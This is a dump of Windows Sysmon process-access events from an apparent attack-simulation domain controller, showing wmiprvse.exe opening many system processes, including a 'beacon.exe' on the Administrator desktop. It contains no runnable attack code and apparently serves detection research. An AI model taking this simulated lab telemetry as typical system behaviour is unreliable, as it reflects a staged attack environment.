10341000x80000000000000001696890Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696889Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696888Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.739{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.724{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 